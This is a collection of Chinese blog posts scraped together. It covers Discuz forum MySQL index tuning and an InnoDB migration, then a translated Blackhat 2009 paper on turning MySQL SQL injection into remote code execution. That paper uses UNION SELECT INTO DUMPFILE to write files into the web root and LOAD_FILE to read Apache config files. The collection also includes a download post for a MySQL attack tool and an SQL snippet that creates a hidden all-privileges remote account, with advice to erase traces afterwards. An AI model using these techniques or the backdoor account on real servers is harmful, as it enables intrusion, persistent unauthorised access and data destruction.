66160*10 = 661600 次索引,够夸张吧 :(
再分析 cdb_threads 和 cdb_posts 的索引情况:

 mysql>show index from cdb_posts;
+-----------+------------+----------+--------------+-------------+-----------+----------
---+----------+--------+------+--+
| Table     | Non_unique | Key_name | Seq_in_index | Column_name | Collation | Cardinality | Sub_part |
Packed | Null | Index_type | Comment | +-----------+------------+----------+--------------+----
---------+-----------+-------------+----------+--------+------+--+
| cdb_posts |          0 | PRIMARY  |            1 | pid         | A         |      680114 |     NULL | NULL   |
| BTREE      |         |
| cdb_posts |          1 | fid      |            1 | fid         | A         |          10 |     NULL | NULL   |
| BTREE      |         |
| cdb_posts |          1 | tid      |            1 | tid         | A         |       68011 |     NULL | NULL   |
| BTREE      |         |
| cdb_posts |          1 | tid      |            2 | dateline    | A         |      680114 |     NULL | NULL   |
| BTREE      |         |
| cdb_posts |          1 | dateline |            1 | dateline    | A         |      680114 |     NULL | NULL   |
| BTREE      |         |
+-----------+------------+----------+--------------+-------------+-----------+---

以及

 mysql>show index from cdb_threads;
+-----------+------------+----------+--------------+-------------+-----------+-------------+
----------+--------+------+-----+
| Table       | Non_unique | Key_name  | Seq_in_index | Column_name | Collation | Cardinality | Sub_part |
Packed | Null | Index_type | Comment | +-----------+------------+----------+--------------+-----
--------+-----------+-------------+----------+--------+------+-----+
| cdb_threads |          0 | PRIMARY   |            1 | tid         | A         |       68480 |     NULL | NULL   |
| BTREE      |         |
| cdb_threads |          1 | lastpost  |            1 | topped      | A         |           4 |     NULL | NULL   |
| BTREE      |         |
| cdb_threads |          1 | lastpost  |            2 | lastpost    | A         |       68480 |     NULL | NULL   |
| BTREE      |         |
| cdb_threads |          1 | lastpost  |            3 | fid         | A         |       68480 |     NULL | NULL   |
| BTREE      |         |
| cdb_threads |          1 | replies   |            1 | replies     | A         |         233 |     NULL | NULL   |
| BTREE      |         |
| cdb_threads |          1 | dateline  |            1 | dateline    | A         |       68480 |     NULL | NULL   |
| BTREE      |         |
| cdb_threads |          1 | fid       |            1 | fid         | A         |          10 |     NULL | NULL   |
| BTREE      |         |
| cdb_threads |          1 | enablehot |            1 | enablehot   | A         |           2 |     NULL | NULL   |
| BTREE      |         | +-------------+------------+-----------+--------------+-------------+------

看到索引 fid 和 enablehot 基数太小,看来该索引完全没必要,不过,对于fid基数较大的情况,则可能需要保留>该索引.
所做修改如下:

 ALTER TABLE `cdb_threads` DROP INDEX `enablehot`, DROP INDEX `fid`, ADD INDEX (`fid`, `lastpost`);
ALTER TABLE `cdb_posts` DROP INDEX `fid`, ADD INDEX (`author`(10));
OPTIMIZE TABLE `cdb_posts`;
OPTIMIZE TABLE `cdb_threads`;

在这里, p.author 字段我设定的部分索引长度是 10, 是我经过分析后得出来的结果,不同的系统,这里的长度也不同,最好自己先取一下平均值,然后再适当调整.
现在,再来执行一次上面的慢查询,发现时间已经从 6s 变成 0.19s,提高了 30 倍.
这次先到这里,下次继续 ^_^

很早以前写过一个文章，是关于discuz论坛的优化：MySQL优化 之 Discuz论坛优化。 写的时候是2006年，没想到过了这么久，discuz论坛的问题还是困扰着很多网友，其实从各论坛里看到的问题总结出来，很关键的一点都是因为没有将数 据表引擎转成InnoDB导致的，discuz在并发稍微高一点的环境下就表现的非常糟糕，产生大量的锁等待，这时候如果把数据表引擎改成InnoDB的 话，我相信会好很多。这次就写个扫盲贴吧。

1. 启用innodb引擎，并配置相关参数

#skip-innodb
innodb_additional_mem_pool_size = 16M #一般16M也够了，可以适当调整下
innodb_buffer_pool_size = 6G #如果是专用db的话，一般是内存总量的80%
innodb_data_file_path = ibdata1:1024M:autoextend
innodb_file_io_threads = 4
innodb_thread_concurrency = 20
innodb_flush_log_at_trx_commit = 1
innodb_log_buffer_size = 16M
innodb_log_file_size = 256M
innodb_log_files_in_group = 3
innodb_max_dirty_pages_pct = 50
innodb_lock_wait_timeout = 120
innodb_file_per_table

2. 修改表引擎为innodb

mysql> alter table cdb_access engine = innodb;

其他表类似上面，把表名换一下即可…
将表存储引擎改成innodb后，不仅可以避免大量的锁等待，还可以提升查询的效率，因为innodb会把data和index都放在buffer pool中，效率更高。

相关文章

• Mysql另类盲注中的一些技巧
• MySQL监控快速指南
• Discuz! 7.2 最新注入漏洞分析与利用
• Discuz7 记录明文
• discuz!7.1、7.2远程代码执行漏洞exploit
• MySQL安装详细图解
• Discuz!NT 3.0 特殊环境下利用漏洞
• MySQL导入数据库文件最大限制2048KB的修改解决办法
• Discuz! Plugin JiangHu <= 1.1 Sql injection Vulnerability
• MySQL数据库安全配置指南

blog:http://blog.csdn.net/cnbird2008

1.简介(文章中的堆查询其实就是联查)
这个文章主要描述怎样再LAMP和WAMP平台上实施远程命令执行代码通过SQL注入漏洞。攻击者再Mysql平台上进行SQL注入必须处理一

些限制和约束。例如,在一个不流行的平台中进行远程命令执行漏洞的一些查询语句缺乏复杂的声明,相对其他平台来说。再最近的这

些年一些人开始仔细研究,这些人专注于利用SQL注入漏洞进行随心所欲的代码执行漏洞。然而，这些类型的攻击集中在支持堆查询

DBMS连接上。这个文档将会解释怎么使用不同的方法去完成那些不支持堆查询的DBMS连接,并且得到跟支持堆查询的DBMS相同的结果

。

2.描述
SQL注入漏洞是把恶意代码注入到正常的SQL查询中的一种攻击方式.SQL注入攻击允许恶意的用户去得到数据库的结构和挖掘出宝贵的

应用操作系统环境。
运行命令执行漏洞已经被证实了是最高级别的恶意用户去获得成功的SQL注入攻击行为。
Mysql是在LAMP和WAMP上最流行的数据库服务器软件套件。DBMS连接默认是不支持堆查询。这就使得一些技术去实施远程代码执行漏

洞的条件是在某些平台需要支持堆查询。

3.堆查询
堆查询是一个去定义是否数据库连接层某个时刻能运行多于一个的查询语句。每个查询用分号分隔开。
下面的就是再SQL注入攻击中的一个堆查询的例子
SELECT name FROM record WHERE id = 1; DROP table record; DROP table address--

在上面的例子中，在同一时刻这里有三个分离的查询请求。第一个查询是来自现实中应用程序的正常查询。这个查询允许进行数据库

查询，然而当堆查询默认进入Mysql-php应用,一个错误信息将会被应用程序返回，同时没有任何语句被执行。

4.攻击应用程序上不支持Mysql堆查询的方法
已经被发现的Mysql UDF(User Define Function)库创建技术,它能被用在支持堆查询的应用上进行远程代码命令执行漏洞。这个技术

已经再数据库黑客大曝光做了详细解释。

在Blackhat 2009欧洲大会上,Bernando Damele解释了相似的技术。下面的步骤来自于它的whitepaper
1)创建一个字段的表，数据类型是longblob
2)把本地文件的内容进行对等的16进制的转换。
3)切分16进制的字符串到1024字符长的大块
4)INSERT 第一个大块进支持表的字段里面
5)UPDATE其他的大的块添加到这个表的字段里面
6)导出表中的字段中的16进制的文件的内容到一个指定的目标文件路径,使用的方法是SELECT's INTO DUMPFILE.再Mysql上这个是可

以实现的，一个查询例如SELECT 0x41将会返回ASCII字母编码A。

这里有一些环境去实施这个堆查询
1) DBMS连接必须支持堆查询
2) Session用户必须有FILE,INSERT,CREATE和UPDATE权限
3)再一些低于Mysql 5.1.19的版本中，工项目路径必须对于Session用户可写。
4)再高于Mysql 5.1.19的版本上，系统变量plugin_dir必须存在并且对于Session用户可写。

现在大家已经知道了这个技术有一些限制，默认的,作为mysql用户启动的Linux Mysql共享库的路径是不可写的。

然而这个特性并不适合于windows。默认windows的Mysql运行账户是Local System，也就是说文件可以被用户创建到任何文件夹。最

新的Mysql版本，系统变量plugin_dir已经不存在了,这个目录可以创建同时可以被Session用户写入。

5.攻击Mysql不支持堆查询的方法

由于再Mysql-PHP平台上不支持堆查询，运行另外一个查询再正常的语句后是不可能的。然而运行另外一个SELECT查询是可以使用

UNION语法的。UNION语法是合并多个SELECT查询到一个单独的结果中。

Mysql 5.1的官方手册(省略自己去官方看SELECTG语法)

从上面可以看到我们可以通过UNION SELECT使用SELECT INTO DUMPFILE去把可执行的文件上传到数据库服务器上。当注入这个查询的

时候，只有唯一的语句可以创建全部的文件。同样的，这个文件不能被另外一个SELECT INTO DUMPFILE语句覆盖掉。

来自Mysql官方文档
Only the last SELECT statement can use INTO OUTFILE/DUMPFILE. (However,the entire UNION result is written to the

file.)
由于UNION查询的特定，数据将会写入到文件中。
例如
SELECT content FROM data WHERE id=21 UNION SELECT 0x8A789C....... INTO DUMPFILE ‘file’

第一个查询返回任何数据，这个数据将会覆盖文件头部。预防这个的方法就是，我们可以再WHERE字段插入任何不存在的值所以没有

数据从这个查询冲被取出。
这个文件可以被运行再WEB目录里面,在这个例子里面DBMS连接不支持堆查询，所以最好的方法是上传文件到Apache WEB server目录

，然而这个只可能再mysql数据库和WEB SERVER再同一个机器上。PHP脚本可以运行SYSTEM函数。同样的这个技术也有一些限制:
1)必须知道Apache的WEB SERVER目录
2)Session用户必须有FILE权限
3)Session用户可以访问上传到WEB SERVER服务器的目录的文件。
自己补充一个4) GPC为off

6.WEB服务器目录的指纹
在一些实例中WEB服务器的主目录不是默认安装的目录,指纹获取可以被用于获取这个信息，这里主要有2个方式去找到WEB服务器目录

的指纹。主要是通过应用程序返回的错误信息可以得到这个指纹。

6.1通过错误信息方法或者指纹
默认的PHP关闭了错误信息。这里有多种方法去返回包含WEB服务器目录的错误信息。例如，再SQL语句部分输入一个单引号，错误信

息就暴露出来了。下面有一个使用'出错的例子
Fatal error: Call to a member function execute() on a non-object in /var/www/output.php
on line 15
6.2通过LOAD_FILE方式获得指纹
LOAD_FILE可以去读取数据库服务器上的文件。去使用这个过程，Session用户必须有文件权限。这个文件同时对于所有用户可取同时

文件的大小必须要小于Apache配置文件中的max_allowd_packet的大小。再Apache配置文件中DocumentRoot指令包含了Apache WEB服

务器的主目录。

这里有一个用LOAD_FILE去读APACHE配置文件的例子，默认安装的Ubuntu Linux
SELECT LOAD_FILE('/etc/apache2/sites-available/default')

7.最大的恶意代码运行的大小

Apache中的LimitRequestLine指令允许WEB服务器去削减HTTP请求的大小。这包含了所有的通过GET请求发送的请求信息，默认值是

8190Bytes。如果SQL注入再GET请求上同时这个恶意代码超过了这个大小的话，Apache WEB服务器将会回复一个HTTP 414的状态码。
。

默认的Apache WEB服务器设置LimitRequestBody为2GB，这个是HTTP请求的body体中的大小。所以SQL注入发送到POST请求里面，可以

给恶意代码提供2G的发挥空间。

WEB应用防火墙可以去禁止打的请求。这个长的请求也可以是缓冲区溢出攻击。

8.恶意代码的压缩和解压缩。

PHP包含了一个zlib的模块可以去读和写gzip压缩文件。这个模块可以把一个恶意文件通过压缩成一个非常小的文件。Zlib模块可以

压缩我们的文件从9635字节到630字节。当压缩文件成功上传到WEB服务器上以后，gzuncompress过程可以反解码出这个文件。当然条

件还是Mysql数据库和Apahce WEB服务器再相同的机器上。

9.处理字段
UNION字段将会联合从复合的SELECT语句中连接到一起。这两个查询必须有相同的字段数。
例如
SELECT name, add, content FROM data WHERE id=21 UNION SELECT NULL,NULL,
0x8A789C....... INTO DUMPFILE ‘file’
第一个的查询的结果将会加入到我们的文件中。我们再第五部分讲过，我们可以再WHERE字段插入任意不存在的值，所以再第一个查

询中是没有任意结果的。然而，由于再这个查询中需要额外的字段请求，任何坏的字符数据被加入到了我们的文件中。
我们可以用一下方法查询
SELECT name, add, content FROM data WHERE id=4444 UNION SELECT
0x8A789C.........,0x00,0x00 INTO DUMPFILE ‘file’
另外一种方式是SELECT name, add, content FROM data WHERE id=4444 UNION SELECT 0x8A,
0x78,0x9CED......9EEC....... INTO DUMPFILE ‘file’

10. 再LAMP平台上进行远程代码执行漏洞。
在LAMP平台上进行远程代码执行漏洞有一些限制，默认的mysql是以mysql用户启动的。恶意文件通过SELECT INTO DUMPFILE必须需要

Mysql用户有写权限。默认的上传的文件是不可以运行的，但是可以读的。文件属组是Mysql用户。PHP脚本可以读这个文件和写个相

同内容的新文件。这个文件创建所有者是www-data用户，PHP文件的权限可以通过运行PHP SYSTEM函数进行修改。

11.在WAMP平台上进行远程代码执行
远程代码执行漏洞再WAMP上只有少数的限制。默认mysql是作为本地系统管理员用户登录的，默认的上传的PHP脚本可以添加用户，增

加服务器等操作。

参考：
[1] LAMP

http://en.wikipedia.org/wiki/LAMP_(software_bundle)

[2] WAMP

http://en.wikipedia.org/wiki/WAMP

[3] St acked Quer i es

http://www.sqlinjectionwiki.com/Default.aspx?Page=Stacked%2

0Query&AspxAutoDetectCookieSupport=1
[4] MySQL 5.1 Ref e renc e Manual : Adding New
Funct ions

http://dev.mysql.com/doc/refman/5.1/en/adding-functions.html

[5] Dat abase Hacke r ’ s Handbook

http://www.ngssoftware.com/press-releases/database-hackershandbook-

published/
[6] Advanc ed SQL Inj e ct ion Exploi t at ion to Ope r at ing
Sys t em Ful l Cont rol

http://www.blackhat.com/presentations/bh-europe-

09/Guimaraes/Blackhat-europe-09-Damele-SQLInjectionslides.
pdf
[7] MySQL 5.1 Ref e renc e Manual : INSERT Synt ax

http://dev.mysql.com/doc/refman/5.1/en/insert.html

[8] MySQL 5.1 Ref e renc e Manual : UPDATE Synt ax

http://dev.mysql.com/doc/refman/5.1/en/update.html

[9] MySQL 5.1 Ref e renc e Manual : SELECT Synt ax

http://dev.mysql.com/doc/refman/5.1/en/select.html

[10] MySQL 5.1 Ref er ence Manual : Pr ivi l eges
Provided b y MySQL

http://dev.mysql.com/doc/refman/5.1/en/privilegesprovided.

html
[11] MySQL 5.1 Ref er ence Manual : CREATE
FUNCTION Syntax

http://dev.mysql.com/doc/refman/5.1/en/create-functionudf.

html
[12] Shared Libra r y

http://en.wikipedia.org/wiki/Library_(computing)#Shared_librari

es
[14] MySQL 5.1 Ref er ence Manual : UNION s ynt ax

http://dev.mysql.com/doc/refman/5.1/en/union.html

[15] PHP Sys t em Funct ion

http://ar.php.net/system

[16] MySQL 5.1 Ref er ence Manual : St r ing Funct ions

http://dev.mysql.com/doc/refman/5.1/en/string-functions.html

[17] Apache Core Fe atur es

http://httpd.apache.org/docs/2.1/mod/core.html#documentroot

[18] PHP Zl ib Funct ions

http://www.php.net/manual/en/ref.zlib.php

[19] PHP gz compr es s Funct ion

http://www.php.net/manual/en/function.gzcompress.php

[20] PHP gzuncompr es s Funct ion

http://www.php.net/manual/en/function.gzuncompress.php

[21] Adl er32 Che cksum

http://en.wikipedia.org/wiki/Adler-32

[22] RFC 1950
http://tools.ietf.org/html/rfc1950

相关文章

• Mysql另类盲注中的一些技巧
• MySQL监控快速指南
• MySQL安装详细图解
• MySQL导入数据库文件最大限制2048KB的修改解决办法
• MySQL数据库安全配置指南
• 关于MySQL权限
• MySQL优化 之 Discuz论坛优化
• MySQLhack
• MySql远程任意用户建接语句

MySQL 利用工具.
连接对方的MySQL后,可以上传文件,执行dos命令.以及下载文件并运行.

软件需要 Microsoft .NET Framework 2.0 支持
无法打开软件请安装 Microsoft .NET Framework 2.0
Microsoft .NET Framework 2.0 下载地址:
http://www.microsoft.com/downloads/details.aspx?FamilyID=0856eacb-4362-4b0d-8edd-aab15c5e04f5&displaylang=zh-cn

下载地址：mysqlhack.zip

上图：

相关文章

• Mysql另类盲注中的一些技巧
• MySQL监控快速指南
• MySQL安装详细图解
• MySQL导入数据库文件最大限制2048KB的修改解决办法
• MySQL数据库安全配置指南
• 关于MySQL权限
• MySQL优化 之 Discuz论坛优化
• 高级Mysql攻击技术(翻译blackhat 2009文章)
• MySql远程任意用户建接语句

CREATE USER 'itpro'@'%' IDENTIFIED BY '123';GRANT ALL PRIVILEGES ON *.* TO 'itpro'@'%' IDENTIFIED BY '123'WITH GRANT OPTION MAX_QUERIES_PER_HOUR 0 MAX_CONNECTIONS_PER_HOUR 0 MAX_UPDATES_PER_HOUR 0 MAX_USER_CONNECTIONS 0;

搞完事记得删除脚印哟。

DROP USER 'itpro'@'%';

DROP DATABASE IF EXISTS `itpro` ;

相关文章

• Mysql另类盲注中的一些技巧
• MySQL监控快速指南
• MySQL安装详细图解
• MySQL导入数据库文件最大限制2048KB的修改解决办法
• MySQL数据库安全配置指南
• 关于MySQL权限
• MySQL优化 之 Discuz论坛优化
• 高级Mysql攻击技术(翻译blackhat 2009文章)
• MySQLhack